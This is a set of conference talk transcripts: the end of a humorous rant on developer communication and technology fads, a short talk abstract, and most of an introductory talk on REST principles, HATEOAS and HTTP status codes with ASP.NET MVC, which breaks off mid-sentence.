communication flow. It helps you understand, it helps you express yourself in different ways. It's not about: we are the smartest guys in the freaking world, and we're just going to talk the way we talk, and we don't talk bullshit — except when we talk about semicolons, but we don't talk bullshit — and we don't like this small talk crap about how the weather is. I don't give a crap about the weather. You do? You live in Australia — you shouldn't, it's always sunny. And the other thing you should ask yourself: does incomprehension reflect on your work? Does it make your code more complex? I mean, what is code? It's an expression of oneself. Does it make your user interface more complex? Developers suck at user interfaces. Yes, but you know why? Because we suck at communication, right? We don't have a clue how to communicate with anyone that's not a developer. And we think that everyone is as smart as us, and everyone understands things, and if they don't, they're stupid. I had to give up a company, seriously. I had 50% in a company, and I left that company, and I gave up everything I owned in it, because I couldn't work with a developer on the team. When I used to ask him something, or someone else used to ask him something, he would explain it. 
If they would not understand it, he would say, you're stupid. Right? No — you're stupid. You're stupid for not explaining it in a way people understand. If you explain something to someone and they don't understand, and you explain it again and they don't understand, it's your problem. It's not their problem. You need to explain it in a way they will understand. But if you only talk to developers that know exactly the same as you, it becomes harder to talk to people that are not developers, including who? Your wife. Yes, that is higher in the rank of importance, but I was going to say customers. And then we get this. And you know, I'm not going to take a screenshot of anyone else's software. No, I'm going to take it of our own, of JetBrains. Right? This is a screenshot of YouTrack, and hopefully it's fixed, or will be fixed after I had a little discussion with the developer. You know what that is? YouTrack will poll TeamCity every X minutes. That is a Quartz expression that you have to enter to say how many minutes you would like for me to poll TeamCity. Really? I was expecting a little spin box: two minutes, two hours, five minutes. No, no, no — click on that link, read the whole documentation on Quartz expressions, and then enter the expression. And when I talked to Dimitri, he says, well, what's wrong with it? It's flexible. And that is a problem, because we don't know how to communicate and we just think that everyone is at our level, and it doesn't matter how many times we say it, it still won't make sense. This is TweetDeck. If you've ever had TweetDeck and you don't have an internet connection and you have several accounts — you're a professional twitterer, or a twat, like me — this is what you get. Forget that the message, you know, doesn't make any sense to a normal user — just constantly repeat it to me, because that's really going to help me understand. But you know, the problem is that this leads to bigger problems, right? It leads to things like: I don't talk to customers because they make me nervous. A very, very, very smart developer told me this just last week, and I won't name the person — I won't even say if it's a male or female; I mean, it is one of those, but I don't want to give off any hints. They said that customers make them nervous because they can't communicate with them. Okay, fair enough. I don't need stupid customers, right? Yeah? As a marketing guy, I say to a developer, you know, the customers don't understand this. Well, screw them. They're stupid. No. If you don't talk to your customers, how do you know if they're stupid or not? Right? It leads to this. It leads to these problems. And then we say, oh, we hate sales and marketing people. Yeah, you know why? Because they don't look at customers the same way you guys look at customers. They have to deal with customers. They have to do social activities with customers. They have to do social talk, but it's part of the deal, right? Because for us, it's important. Why? Because we are solving people's problems. That's it. We can't say let anyone else do it. Remember how we said one of the issues was that, you know, the project manager talks to the customer and then that goes to the business analyst, blah, blah, blah, and by the time it gets to me, it's completely different to what the customer said. And now we say, yeah, but let someone else deal with the customer. I had... 
I tweeted something and someone replied to me and said, I never talk to customers because they really, really piss me off and I have a middleman do it. But that is a problem you need to solve for yourself, right? Because it will make you much better in all aspects of life, right? And when I say communicate with others, I don't mean going to a shop and ordering something, right? That's not improving your communication. And we get this customer disconnect, right? Because if we don't learn to speak the language of the customer, if we don't understand emotions, if we don't understand the different people of different countries in this global world that we live in express themselves differently, right? If we don't learn to deal with these things, it's dangerous because we can start to offend people. We can start to offend customers. And you know why this happens? A lot of times, this happens is because we have a disconnect from revenue. If you work in a company that sells shrink-wrapped software, you often are disconnected from that revenue. Customers getting pissed off doesn't immediately have an effect on your salary. If you work as a consultant, customers getting pissed off doesn't immediately affect on your salary. And you start to lose sight of where your salary is coming from, where your income is coming from. So you start to care less. But if every time they say to you, if you piss off a customer, we'll piss you off by reducing your salary, will you start to care a little bit more? No, you'll say that's unfair. The customer's an idiot. He was wrong. How do you know? Did you talk to him? Did you understand him? Right? This is important. And this can break a company. This can destroy a product. It destroyed a product I was working on. And again, we're losing the plot. We're thinking again, so much about us. We're so self-involved about our product and how our product is great. And we must, we have tens of thousands of users. So our product must be amazing. And our customers are using it. And they must be happy. I don't know. If you make custom software, how many times do you go during a year and sit next to your customer for a whole day and see him frustrated and angry with your software that he doesn't communicate back to you? Because he says it's not worth it. These idiot developers don't understand anything. It's not only our fault, it's their fault as well. Right? But we're not going to sit back and say, well, it's their fault. We should drive the change ourselves. Then we have another issue that's come up. Now is the knowledge-driven design or as someone else called it, CV-driven design. Right? The Church of Technology Fashion. Right? This is from one of these videos on Node.js, which, you know, the two, the one says, oh, Node.js is great and the other one's, you're an idiot. And oh, no, you're an idiot. Right? And he says, you're subscribed to the Church of Technology Fashion. And it's true. You know, remember Clipper? How many of you did Clipper here? Wow, I was expecting more than one. Oh, at least Delphi. I did Clipper. I did Delphi, MongoDB. Right? All these different technologies that are coming and going. Right? And if you're doing.NET today, you're so, so two years ago. Oh,.NET. Oh, that's for losers. Today it's Ruby. No, actually that was yesterday. Today it's Node. Right? Why? Oh, well, because all the innovation is happening in Ruby. Bullshit. Innovation is not about a framework. Innovation is not about a language feature. 
Innovation is about how you are impacting people, how you're changing their lives, how you are developing the product that changes their lives. It's not about language features. Technologies help you. But we're so obsessed with this, and the social pressure — oh, you've got to learn this, or you've got to learn that, or you've got to do this — or, what happens if the world starts to go to a non-managed language and I'm in a managed environment, what am I going to do? Look for the balance. There are people solving today's problems, helping people, still using Delphi, and they're doing a pretty damn good job of it. And they're spending their time solving problems, not having debates or saying, oh, you're a loser because you're not doing Node today. And then we hook onto these technologies and use them without actually thinking of the consequences. We don't ask the non-technical questions. We say, oh, will it scale? Right? What about the non-technical questions? What about: will the benefit outweigh the cost it will impose on my company? Not on me — oh, I gain experience — but what about on my company? How many times have you used a framework... you've gone from NUnit to MSTest, or from MSTest to xUnit, for one minor change, right? What is the benefit of that? What are you gaining? Because Joe is using it. How many times have you changed an ORM? Every time you use a new ORM in a new project, would you say that you have used it perfectly? No, we all make mistakes the first time we use things, right? We learn as we go along. Do we think about that impact? So yes, sometimes it calls for changing things. Sometimes it calls for using a different framework — but not for the sake of it, not to learn. Because we know that the first time we use it, we're going to screw up anyway. And what about the legacy that we leave behind? We go from one ORM to another to another, and who's going to maintain it? Oh, the guy that comes after me. I mean, especially with the explosion of open source projects and everything nowadays — now everyone throws something up on GitHub or CodePlex or whatever, you go pull it down, work with it. And then the guy goes, oh, I'm sick of this, I'm bored, I'm going to move on to something else. And you're like, well, I was using it for that; I'll move on to something else. And then poor Joe comes to your company and is like, what the hell is this? Oh, I'll just click on the documentation. Oh, URL not found. Oh, page not found. What benefit did that new framework, or that new testing framework, or this or that, add to you or to your company for you to make that decision to switch, if it wasn't only about: oh, well, I'll learn something new, and maybe it will help? Remember how Twitter used Ruby and everyone said, well, Ruby must be great, Twitter is using it. Yes — an organization that has no business plan, right? You know the routine: set up a company, create a product, get the users, bleep bleep bleep, and become rich, right? Twitter to date still doesn't have the bleep bleep bleep. And not only that, they went back to Java for certain things. They said, well, this dynamic thing isn't that maintainable, we're going back to Java. And everyone said, oh, no, they just don't understand. When it was time to say, let's use Ruby because Twitter is using it, you were fine. But now they just don't understand? And when I say Ruby — I could say anything, I could say Mongo, I could say whatever — I'm not picking on a certain technology. 
I'm just saying, are we asking the right questions when we're making these choices? You know, what are we trying to accomplish here? What is it that we're trying to solve? But anyway, that's enough. Okay, I'm angry enough, and I'm going to stop. Okay. But you know, we have a really challenging profession. I mean, think about it. This is a manufacturing plant. And I'm not picking on that profession. But how many professions are there in this world that are like this, where you have to do the same thing over and over and over and over again? Right? Yet for us, each day — I mean, I wake up every morning really excited about my work. Because it's a challenge. And it's not a challenge because I'm going to learn something new necessarily. I think of it as a challenge of how I'm going to help improve what I am doing. We are faced with problems. We have to solve problems. We have to solve algorithms. We have to solve technical difficulties. We have a challenging life. It doesn't get boring. So let's not try and make it less boring by focusing on things that don't have relevance. I mean, we have one of the most amazing professions, along with people like engineers, along with people like doctors — obviously doctors save lives, but we can impact lives. I don't know how many of you went to see Guy's session on mind control. How many of you went to see that? Right? He was putting a sensor on his head, and the sensor was reading his eye going left or right, or him smiling, and it was moving a computer. This helps people that have physical impediments. We can make people's lives better. Very few professions in the world have that. And the beauty of this is that you don't need a master's degree to do it. You just need to have passion and concentrate on what you have to concentrate on. Right? So we can do better by focusing on what we need to improve. And as Aral was saying — and I use this with his permission — not only make other people feel like Superman, but ourselves be Superman, because we helped others feel good. And we don't do that by wasting our time on stupidities. And there have been far too many stupidities going around lately. Okay? So to sum up in one word — or one sentence: focus on what it is you need to focus on, and don't lose the plot. Okay? That is the epitome of the unicorn craze that we have as developers. I wanted to find something that was truly shocking, and thanks to Philip, I managed to succeed. Okay? So that's it, people. We're 10 minutes short, which, if you want, I can continue to bitch. No, I will let you go. Those are my details. I very much appreciate it. I hope you at least had a laugh, because content-wise, it was empty. But thank you very much.
|
Our job is one of the most demanding and hardest there is. We play a crucial part in the business, yet we are often misunderstood and wrongly managed. We are craftsmen. We are under-appreciated, under-valued and often under-paid. Look at the world today: it is built by people like us, people like Mark Zuckerberg et al. We are the fundamental pillar of businesses of the 21st Century. We are the Prima Donnas. It's about time you treated us like it.
|
10.5446/50968 (DOI)
|
So, is this on? Can you hear me? Yes. Good. Good afternoon. Hi. Hello. Good afternoon. Are you tired? I didn't get that. Are you tired? No. Oh, good. It's Friday. How many of you were here last time? How many of you have been here for the whole week, including workshops? It must be tiring, huh? Right. So I'll make this session very short and sweet. It won't be too complicated and it'll be quite easy to follow along, hopefully. If you are here, this is a talk on REST with ASP.NET MVC. And the main agenda here is a brief introduction to REST. Right? So how many of you here know what REST is, or have been working with RESTful systems? Okay. So we're going to rehash what REST is, just in case, for the people that aren't too clear on the topic. And then I'm going to show you how you can leverage ASP.NET MVC to do REST. Okay? Or create RESTful systems. Now, one word of warning. How many of you are here to see Web API? Okay. If you are, you're in the wrong room. Right? I'm not going to show Web API. I'll explain why I won't show it later on. It's not that I don't like the technology; it's just that I think it's not relevant, at least not to this talk. Okay? So don't say I didn't warn you. And cheer up, please. Really, don't be so gloomy. It's okay. Did anyone come to my morning talk? Right. Everything I said — don't hold it against me. I love you all. Really, I do. Today, I'm a developer again this afternoon. So let's think Web. Right? And if I say to you Web, what do you think? Yeah, you're going to have to speak louder than that. What else? JavaScript. What else? JavaScript. What? You took the worst part of the Web and brought it out. Pardon? Freeform. Freeform. Free porn. It's free? Oh. Okay. I wasn't thinking about porn. Distributed architecture. Would you agree that the Web is a distributed platform? Would you agree that we can accomplish scalability with it? That we think about scalability when we think Web? About statelessness and caching, because those are inherent in the way the Web works? A simple interface? I mean, it doesn't get much simpler than the Web. Right? Go to a page, get a page, post some data, get some data back. It's as simple as it gets. If you want to go somewhere, you click on a link. If you want to fill something out, you fill in a form. It doesn't get simpler than that. And loose coupling, which it allows us to do, because we have these things like server farms and we have failovers and we have Azure and we have EC2 and we have all these different things that allow us to create loose coupling for our systems, so that one doesn't fail if the other one fails, et cetera. Now let's think about system design. What are the goals that we try and accomplish in system design? Well, the big one, I hope, is maintainability. Yeah? I mean, we're assuming already that the system works the way it should and everything, and we've talked to the customer and all that dandy stuff is all over and done with. From a technical point of view, we try and achieve maintainability. Right? We try and accomplish that so that we can create a system that works and that we can maintain over time. We try and create a system that is reliable. For those of us that work on very, very large projects that are very successful, that are accessed by millions of users in one-hour intervals — how many of them are there hidden in this room? One? Okay — you look for scalability. And we also try and accomplish simplicity. 
We try and make the simplest kind of interface. No, we don't. That's... we aim to try and make the simplest kind of interface. That's not really valid. I'll take that one out. But if you take these goals and you put them alongside the goals of the web, you kind of see that somehow you can try and match these things up. Not one-to-one as I've put there necessarily, but you can try and see a common ground between what we do when we design systems and the way the web works. So that's REST. That's it. That is the whole idea behind REST. The whole idea behind REST is to look at the way the web has worked and try and project that onto the way we create our systems. That's it. REST stands for Representational State Transfer, and it was written up by a guy called Roy Fielding in his dissertation. It's based on how the web works. So what Roy did was say, you know, the web has offered us a whole bunch of things — all the ones that I've mentioned, among other things. If I were to somehow create my systems so that they offer me these same things, that would be pretty awesome. How do I go about doing that? How can I leverage everything that the web has offered in my systems? And that's when he came up with a series of constraints. He realized that the way the web works requires specific constraints to be put in place, and if we follow these constraints, then we achieve what the web achieves. So if we can somehow take our system design and have it obey a series of constraints, we can potentially obtain the same things the web has, which have a lot in common with the things we try and accomplish when we create systems. So REST is nothing more than a series of constraints. REST is not an HTTP API, right? There are many systems, many systems out there that have RESTful interfaces — yes, in quotes. More like RESTless, because they are not RESTful. Now, can you call them REST interfaces? Sure. You can call a dog a pony as well. But what are you accomplishing? It's not about being dogmatic. It's not about saying, oh, you idiot, it doesn't matter that you call that REST and it's not REST, don't get so worked up. It does matter, because we should call things what they are. Among other reasons, because people that are not familiar with the concepts will just get confused. And then they'll look at your system and they'll say, where are all these promises that you promised me? They're not there. But this is a RESTful system. No, actually, it's not — so that's why you don't have those things, right? So it's very important to distinguish a RESTful system from an HTTP API, which is what the vast majority of systems out there are. We've even been guilty of that. We have a product at JetBrains which we say has got a RESTful API. It does not. And we're pushing to change it, or at least rename it. So let's distinguish the two. HTTP API means I have an interface where you can use HTTP to talk to me. That's it. Nothing more. Now, Leonard Richardson has a book that I recommend at the end of this talk. He came up with this idea of the Richardson maturity model, which basically defines different levels of RESTfulness. And I say RESTfulness in quotes because it's not REST. According to Roy, the only true REST is level three. That is when you can call it a RESTful system. Everything below that is not REST. But this is a good model to allow you to understand what a RESTful system is. And we build up on this to get to what REST is. 
So it's very good to look at what we have actually and build up on it to see where we want to go. Level zero is POX or plain old XML. And this is what the vast majority of systems are. I have an HTTP endpoint and I post some information. Normally I do it in an XML where I define the method call. I define the parameters and I send that over. That's it. That's all I have. And every single operation that I want to perform is a post and the XML contains the operation. So if I want to get a list of customers, I would say get list customers and send it in that package. And do a post. If I say add a new customer, the operation would be add new customer. Here are the parameters. Post. That's level zero. And that's what a lot of systems are. Then we go to level one, which we start to identify this concept of resource, which is fundamental to REST. And we'll cover it a little bit more in detail in a minute. But we get to level one. And here we start to say, okay, well, now I'm not going to have kind of like just one single endpoint. I'll start to have more endpoints. But I still kind of focus on single verbs. But I start to try and create a distinguishment between what these different endpoints are. I don't necessarily identify them as what a resource is, which we'll see, but there can even be operations, et cetera. Then we get to level two. And this is where everyone says, oh, I've reached restfulness. This is the majority of systems out there that say I'm REST. And this basically is, oh, I see HTTP has verbs. Let me use them. Get, put, post, delete, options, head. Right. So now when I want to get a customer, I use get. When I want to create a customer, I use post. When I want to edit a customer, I use put. And I've accomplished REST. No, you've just saved yourself some trouble by not defining operations, but you haven't accomplished REST. Now I keep talking about HTTP and I'll get to a moment later on about if HTTP is important in REST or not. Level three, which is REST is hypermedia. That is the fundamental pillar of REST, which gives us a lot of the benefits that we're talking about. About scalability, about maintainability, about flexibility. All the abilities you think of, it's at level three. Okay. We'll start at level two. We're going to start at where we assume that we have verbs and we have resources. So what is a resource? Anything can be a resource. Anything. A customer can be a resource. A customer list can be a resource. An employee can be a resource. An order can be a resource. A shipping requirement can be a resource. A shipping dispatch can be a resource. A lot of times when people start to look at this REST thing and we talk about resources, the first problem that comes to mind is, okay, I understand the customer is a resource. I understand an order is a resource. What about things that aren't entities? And we'll see how we deal with that. A resource is identified with a URI. Uniquely identifies a single resource, a URL. Then we have representation of resources. So if I access a URL and I say, give me back customer 25 or give me back customer Joe, I can send that customer back using text HTML, which is the page that you see when you go to your website. But I can say, you know what, give me back that customer in application JSON. Or give me back that customer in XML. So I can have different representations of a customer. I could even request a customer as an image and it would give me back the picture of the customer. So we have resources and we have representation of resources. 
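To make the jump between the levels concrete, here is a minimal ASP.NET MVC sketch — the controller names, route shapes and payload format are invented for illustration, not taken from the talk. At level zero, everything funnels through a single POST endpoint and the operation name travels inside the XML payload; at level two, each resource gets its own URI and the HTTP verb says what you want done to it.

    using System.Web.Mvc;
    using System.Xml.Linq;

    // Level 0 (POX): one endpoint, and the operation name travels inside the payload.
    public class PoxEndpointController : Controller
    {
        [HttpPost]
        public ActionResult Index()
        {
            var doc = XDocument.Load(Request.InputStream);
            var operation = (string)doc.Root.Attribute("operation");  // "GetCustomer", "AddCustomer", ...
            // ...dispatch on the operation name and build an XML reply (omitted)...
            return Content("<result/>", "text/xml");
        }
    }

    // Level 2: the URI identifies the resource, the verb identifies what you do to it.
    // Assumes a route mapped roughly like "customers/{id}".
    public class CustomersController : Controller
    {
        [HttpGet]   // GET /customers/25 -> read the resource
        public ActionResult Show(int id)
        {
            return Content("customer " + id);
        }

        [HttpPost]  // POST /customers -> create a new resource
        public ActionResult Create(FormCollection form)
        {
            return new HttpStatusCodeResult(201);
        }
    }
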
So one resource has multiple representations. When we want to request these different representations, we can do it in various ways. And there is no one way that is rest and the other way that is not rest. It's just who is doing it and you can provide one way the other way both ways to provide more flexibility. So if I'm in a browser as a human being, I go and I type customer slash 25.json. And I can get back a JSON representation of my customer. What use would it be to me as a user very little? As a developer, it would make more sense because people want to see web pages when they see customers, not JSON. And I can request that using different URIs or I can request it using this thing called content negotiation. Content negotiation is basically a header in HTTP that the browser sends to the server and says, give me back this resource in this media format. So by default, when you make a request to a URL, by default, the browser says, give me back a resource in text slash HTML. And the server says, here you go. And if you don't have text HTML, you can supply a different format as well. So you can say, give me back in text HTML. And if you don't have text HTML, give me back application XML. And if you don't have application XML, give me back application JSON. And the server will say, I have text HTML. Here you go. If it didn't have it, it would say, but I do have application XML. I'll give you back that. That is why it's called negotiation. Because it negotiates different possibilities and it has fallback options. So we can request a resource in a different representation with either of the two ways. Nothing is more rest than the other. We can even notice here, I have a URL that is pointing to an article that is in Spanish. I can use that or I can use the accept language, which is another header in HTTP, which allows me to specify the language. Okay. Here is one of the most important things of rest, apart from hypermedia, which this is where we start to see the benefit. Rest is based on a uniform set of operations. That means that what I can do in rest is limited. I have a resource. I have a representation of the resource. And what I can do with this is limited. I can create a resource. I can delete a resource. I can update a resource. I can see a resource. That's it. I can't do more. Okay. And there's two important things here. First of all, does this mean that rest is specific to HTTP? No, it does not. It just says these were the verbs that were in HTTP because this was based off of how HTTP works and these are the constraints. The other important thing is what happens when I can't identify something as a rest. So here is a typical scenario that you have when you're trying to do something in a restful way. You say to me, oh, you said I can create everything as a resource. Fine. I will create a customer as a resource. Right? And on that customer, all I can do is create it, delete it, update it, or read it. I can create an order as a resource. And all I can do with that order is what? Create, read, update, delete. How do I manage an operation which is ship order? If there is no verb which is ship order. It's how you think about it. Anything can be an order. Anything can be a resource. So instead of me having an order and an operation which is ship order, what would I have? I would have a resource which is order shipment and then I would create an order shipment. And I could update that order shipment and I can cancel that order shipment. So it's just how you envision the resources. 
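As a rough sketch of the last two ideas — the shipment itself becoming the resource, and one resource having several representations picked off the Accept header — this is roughly how it might look in ASP.NET MVC. The controller, the route shape (orders/{orderId}/shipments/{id}) and the data are all made up, and the Accept handling deliberately ignores q-values and ordering, which real content negotiation would honour.

    using System;
    using System.Linq;
    using System.Web.Mvc;

    // "Ship order" is not a verb we have, so the shipment itself becomes the resource.
    public class OrderShipmentsController : Controller
    {
        [HttpPost]     // POST /orders/42/shipments -> "ship this order"
        public ActionResult Create(int orderId)
        {
            // ...record the shipment for the order (omitted)...
            return new HttpStatusCodeResult(201);
        }

        [HttpGet]      // GET /orders/42/shipments/7 -> "how is the shipping going?"
        public ActionResult Show(int orderId, int id)
        {
            var shipment = new { OrderId = orderId, Id = id, Status = "in transit" };  // stand-in data

            // One resource, several representations: pick one off the Accept header.
            var accept = Request.AcceptTypes ?? new string[0];
            if (accept.Any(t => t.StartsWith("application/json", StringComparison.OrdinalIgnoreCase)))
                return Json(shipment, JsonRequestBehavior.AllowGet);

            return View(shipment);  // fall back to text/html
        }

        [HttpDelete]   // DELETE /orders/42/shipments/7 -> "cancel the shipment"
        public ActionResult Destroy(int orderId, int id)
        {
            // ...cancel it (omitted)...
            return new HttpStatusCodeResult(204);
        }
    }

With routes wired up along those lines, POST /orders/42/shipments means "ship order 42" and DELETE /orders/42/shipments/7 means "cancel that shipment" — no ship-order verb required.
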
What is the benefit of this constraint? Because this is one of the constraints I'm talking about. What is the benefit? Interoperability, among other things. We don't have to have WSDLs anymore, right? What is one of the problems with technologies such as SOAP? You have this big WSDL file and you have to figure out the method names, the parameters, etc. Here it's like: that's all you can do. So as soon as you talk to a RESTful system, you know what you can do with it, right? That's all you can do. And if one system says you're not allowed to delete, it will throw back an error and say you can't delete. But you know that the operation delete is viable. And you don't have to worry about defining these operations. So now you say, right, I've got resources and I know what I can do with them. And that's all I can do with them. So it makes for simplicity and it makes for interoperability. It also leverages certain things such as idempotency and safety. What that means is that sometimes — because we all know that the network is not reliable — certain operations have to be safe. That means if I call it once or a hundred times, it doesn't make a difference. GET is one of those operations. HEAD is another one of those operations. If I make the call and it fails, I know that I can make another call. So as long as you comply with this idempotency and safety, you're good to go. Because if the network fails, you just make another call. Again: complying with a constraint, gaining a benefit. Now here's one that a lot of people ask: is REST only based on HTTP? I mean, can I only use HTTP to do a RESTful system? No — you don't have to. It was based on how HTTP works; it doesn't mean that it is only valid on HTTP. To date, though, I don't know of any other system that is RESTful that does not use HTTP. Right? And at this point, Roy Fielding does say that you have to remain pure and not use anything specific to HTTP. But there are certain abstractions that don't make sense. How many of you use an ORM? Okay. NHibernate? Entity Framework? How many of you have made a repository pattern over Entity Framework? How many of you have regretted it? How many of you have swapped out Entity Framework for NHibernate? Or NHibernate for Entity Framework? So we create these abstractions that hide very important and useful capabilities that the underlying technology has, in case one day we have to swap it out. There are times that abstraction doesn't make sense. And I think that when we're creating RESTful systems, the majority of which are on HTTP, there are certain things we have to leverage from the framework we're on, the protocol we're on. And in this case, it's HTTP. And HTTP is not a transport protocol. It is an application protocol, which is different. People think about HTTP as if it was TCP. It is not TCP. It is a very rich protocol that has headers, bodies, structure. It knows about different fields. It knows about operations. It has status codes. And yet we don't leverage these things. And this is important, and this is one of the distinctions that I make when I talk about why we shouldn't think about Web API and MVC separately. This is what you normally see in applications, right? If everything is OK, send back HTTP status code 200. If it is not, send back a 500. I mean, the number of times that you see applications where any error is thrown back as a 500 — internal server error, right? It's kind of the same as the exception handling we do in our code. Well, if it all goes OK, do this. 
If not, just try catch and do whatever. Don't distinguish the type of exception. These are all the status codes that HTTP has. 200 is OK. 201 means I've created a new resource. It knows what a resource is. It has the concept of a resource. 202 is async operations. Do you know what that means? One of the myths of RESTful systems is that I cannot do asynchronous operations. Yes, you can. You fire a request, and if it's asynchronous, you send back a 202 with a header saying, poll me here to find out how this is going. And then the client polls you in five minutes. But inherently, it knows about asynchronous operations. Resources that have moved, resources that have been found, not found, bad requests. That is, you made a really bad request to my resource. You tried to do something you shouldn't. Unauthorized, I don't have permission. Forbidden, not found. Even conflicts. I've updated a resource. Someone else has updated a resource. There's been a conflict. And all these status codes exist, and all these status codes are similar to the way we require applications to act, and yet we don't leverage it. We just say 200 or 500. So then the question is, oh, wait, how do I send back error information in a RESTful system? You use the status codes. And in fact, these status codes are being enhanced now to provide more. Right, resources, representations, a uniform set of operations, and we have these things called status codes. But that is not enough to create applications. Why? Because among other things, applications need state. Now, remember I said a RESTful system should be scalable. If you have one server and everything is going to that server, and you're making requests to that server and you're using the memory of that server, is that going to be scalable? No. So now we have server farms, right? And we have cookies. Now we've got a problem with cookies, right? Now we have to have server affinity. The cookies have to stick to the same server. So now when a request comes in, it always goes to the same server. And we distribute requests with a load balancer among multiple servers. And these are all problems of scalability. Why? Because we constantly try to store state on the server. And there are other ways to store state. And this is one of the powerful constraints of REST, which gives it flexibility and scalability. It gives us scalability because if I say to you, in REST, you don't store any state on the server, already you've gained some scalability. Flexibility, why? We'll see. HATEOAS is the ultimate REST. That is the level we have to reach, which stands for hypermedia as the engine of application state. Awesome acronym. Does anybody know what that means? No, they couldn't just call it hypermedia. They called it hypermedia as the engine of application state. What's this? I got to wake you guys up. Come on, people, respond to me. Who said that? Well done. You have won a ReSharper... No, I'm just... When you go to Amazon, you see a website, right? How many of you have seen the first version of Amazon like five, six, ten years ago? Has it evolved? Yeah? When Amazon evolves the website, do they call you and say, hey, we've evolved the website? Do you want to learn how the new website works? Do they? But you figure it out, right? Why? You got a page? You got links? You go to those links, you figure out what you can do. You go to a website, it's got links, you figure out what you can do. You drive the flow. 
You say, oh, I can go here, now I can go here, now I can go here, now I can go here. Right? I can go to the shopping cart and I can check out. And before going to the shopping cart, I was here. As humans, we don't need a manual. We don't need someone to tell us what we can do in each state of the application. We figure it out. We discover it by looking at it. So, these links and the forms provide us with the flow through the program. They provide us discoverability through the program. They provide us with decoupling of state. As side effects, we get scalability. Why? What am I saying here? Take this same concept of links where I have a form and I can click on those links as a human being. Take that same concept of links and forms and now say one process can talk to another process in exactly the same way. So, I have resources. I have representations of resources. I have operations I can do on those resources. And now what I'm going to add are links. Every time you make a request with a GET, I will send you back some information and I'll include some links. Every time you make a request with a POST, I can send you some information and I can send you a form as well. And I can say fill out this form. And I'm going to send that back to you, you being the program, the application, the service that is talking to me. And you as that service are going to take that response and you're going to parse it and you're going to say, oh look, there are links here. Oh look, there's a form here. I can fill this out. I can go here. It's not complicated. It's taking the same concept of how the web works from human to machine and getting machine to machine to talk the same way. So now when I log into a site and I go to the first page, and now I am the machine, and I make this request to a resource and that resource is returned to me and that resource returns to me four links. What has that resource told me? What I can do, right? What has that resource also given me? Control of the state, because now the client knows what state it's in. The server no longer has to maintain the state. The client knows now that it can go to these four links. But it's also giving me flexibility. How? Because if tomorrow the service decides to add a fifth link, will it break me? If the way I talk to a RESTful service is, oh, here's some links. Oh, there's a new one. I don't know what to do with this. I'll send an email out to the system administrator and say the service that you're talking to has just provided a new URL. This is it. Here's a link with information about what this URL contains, what you want to do with it. Do you want to adapt your system to use it? If you do, you know you've got to do it in the next iteration. If you don't, we haven't broken everything. Versus SOAP and service contracts, we've just blown things up. And we've got to make sure that all the clients are using the same version at the same time and everything's updated at the same time. Here we provide flexibility. The server is saying this is where you can go. This is what you can do. And it's pushing that state over to the client. That is REST. And if you don't have HATEOAS, if you don't use hypermedia, you don't get this benefit. So when people implement RESTful systems that just use HTTP and just use resources and representations, they're like, yeah, and what? What benefit did I get out of this? Not much. Where is all the RESTful promise? It's not there. Because you didn't do it right. You just called it a RESTful system. 
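A minimal sketch of that machine-to-machine link following, assuming a made-up entry URI and a simple "rel"/"href" link format (REST itself does not mandate one particular hypermedia format): the client acts on the relations it knows and simply ignores new ones.

```csharp
using System;
using System.Linq;
using System.Net.Http;
using System.Text;
using System.Text.Json;
using System.Threading.Tasks;

class HypermediaClientSketch
{
    static async Task Main()
    {
        using var client = new HttpClient();

        // GET the resource; the payload is assumed to carry a "links" array next to the data.
        var body = await client.GetStringAsync("http://example.com/orders/42");
        using var doc = JsonDocument.Parse(body);

        var links = doc.RootElement.GetProperty("links").EnumerateArray()
            .ToDictionary(l => l.GetProperty("rel").GetString(),
                          l => l.GetProperty("href").GetString());

        // The client only follows relations it understands.
        if (links.TryGetValue("payment", out var paymentUri))
        {
            var payment = new StringContent("{ \"amount\": 10.0 }", Encoding.UTF8, "application/json");
            await client.PostAsync(paymentUri, payment);
        }

        // Anything the server adds tomorrow is reported, not a breaking change.
        foreach (var rel in links.Keys.Where(r => r != "payment" && r != "self"))
            Console.WriteLine($"Server also offers '{rel}', not supported yet, safely ignored.");
    }
}
```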
How do we define these links? Well, exactly the same way we define web pages. Yes, you can use HTML. Is it a good idea? Maybe not. Depends. People use classes to designate concepts, etc. You can use formats that you define yourself. You can use another format which is called Atom, Atom Publishing. Atom Publishing has information about a link, who published it, when it was published, where to go from it, etc. Or you can create your own custom formats. Where you say, instead of me giving back application JSON or application XML, I'll give back application slash vnd, which stands for vendor, dot my company, dot the domain, plus XML. Right? Do I have to have different formats for every domain in my company? No. You define that. I can have all my services inside my entire company under one hypermedia format. Does it make sense? A lot of times it doesn't. Does it make sense to break it up based on the domain? Yes, it makes sense based on the complexity of the domain. If it justifies it for itself, you break it up. You define this. Do you need to register this with any organization in order for it to work? No. Is it recommended? Yes. How public is your service? Is your service only going to talk to three different people? Yes. Does it matter if you register it? No. It depends. Right? Anytime you don't know something, you just say it depends. So with hypermedia, we start to get program flow. And one of the things we do, for instance, is a typical operation here, actually that is wrong, let me just do a quick refactoring. I do POST order and I send some information. The HTTP response code, which we just saw, for a new resource being created is what? 201. So it's created. Why POST? Well, normally POST is identified with an operation where the URL, the resource you're pointing to, is not known. When you create a new resource, often that is generated on the service side. Think for example, I add a new order and the order number is generated by the service. So as a client, how do I know what I just generated? You can actually use a link to define it, but there is also a header in HTTP, which is called Location. And what Location does is give you back the location of the new resource you just created. And now you have that resource. And now you can say, now with this resource, I can go and do this operation, or I can do that operation with it. The server creates the resource, sends you back links, sends you back enough information for you to know where to go next. This is a custom format. This is taken from the book REST in Practice, which is also on the recommended list. You can find this online as well. It's a system called Restbucks by Ian and Jim, authors of the book, where they explain to you the flow of ordering coffee through a RESTful system. So I create some coffee. It gives me back the information about the type of coffee I've created. And then it says the status is expected payment. And here is the link you have to click on. Follow the link to make the next step. So the state is being pushed to the client. And if tomorrow, as in their example, a new offer comes out that you get a free donut, you just add a link and say offer free donut, click this. And if someone doesn't click it, if some process doesn't know about that, nothing happens. So knowing this, can we leverage ASP.NET as a RESTful platform? Now, here is the part about, do I need HTTP API, sorry, Web API, and ASP.NET MVC? 
